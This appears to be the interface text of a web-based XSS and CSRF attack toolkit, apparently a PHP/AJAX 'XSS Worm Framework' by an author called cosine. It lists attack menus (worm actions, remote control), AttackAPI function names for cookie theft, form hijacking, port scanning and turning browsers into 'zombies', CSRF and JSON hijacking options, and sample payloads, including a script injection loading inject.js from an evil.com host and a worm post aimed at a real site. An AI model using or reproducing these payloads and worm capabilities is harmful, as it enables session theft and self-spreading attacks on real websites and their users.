Encode/Decode
XSSCodz
CSRFCodz
WormAction
RemoteControl
About
\u
&#x;
,
c
&#
&#;
AttackAPI LIB
.core.bindFunction
.core.clone
.core.extend
.dom.attachEvent
.dom.delCookie
.dom.freeze
.dom.getAgent
.dom.getClipboard
.dom.getCookie
.dom.getCookies
.dom.getDocument
.dom.getInternalHostname
.dom.getInternalIP
.dom.getInternalNetworkInfo
.dom.getPlatform
.dom.getPlugins
.dom.getXHR
.dom.hijackEval
.dom.hijackForm
.dom.hijackView
.dom.include
.dom.parseXML
.dom.request
.dom.requestCSRF
.dom.requestIMG
.dom.requestIMGL
.dom.requestJS
.dom.requestJSL
.dom.requestJSON
.dom.requestLC
.dom.requestXML
.dom.requestXSS
.dom.requestXSSL
.dom.scanExtensions
.dom.scanHistory
.dom.scanPorts
.dom.searchGoogle
.dom.setClipboard
.dom.setCookie
.dom.signatures
.dom.spawnChannel
.dom.spawnSandbox
.dom.spawnZombie
.dom.spider
.dom.sweepPorts
.dom.transport
.dom.triggerEvent
.dom.zombiefy
.dom.zombiefyL
.utils.buildDomain
.utils.buildJSON
.utils.buildQuery
.utils.buildURL
.utils.decodeBase64
.utils.decodeURL
.utils.encodeBase64
.utils.encodeMD5
.utils.encodeURL
.utils.ip2number
.utils.net2range
.utils.number2ip
.utils.packJS
.utils.parseDomain
.utils.parseJSON
.utils.parseQuery
.utils.parseURL
.utils.range2net
src="http://www.yeeyan.com/groups/newTopic/" title="xss" content="from xss worm:)"
Content-Type
multipart/form-data
application/x-www-form-urlencoded
injectScript('http://www.evil.com:8888/web2ghost/lib/inject.js'); setTimeout("injectIframe('http://www.baidu.com')",1000);
CSRF Type
GET
POST
CSRF Language
JavaScript
Flash AS3
ASP
PHP
Python
Cross-domain data retrieval
Flash AS3
ASP
PHP
Python
JSON Hijacking
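A tool that makes XSS and CSRF work easier, and that will integrate more good ideas.
The prototype was written on 2008-04-05, when it was positioned as an XSS Worm Framework. It has been improved a good deal since then, but it is still far from powerful enough.
The back end uses PHP, and all interaction between the front end and the back end is done via AJAX :)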
by cosine, mail:
[email protected]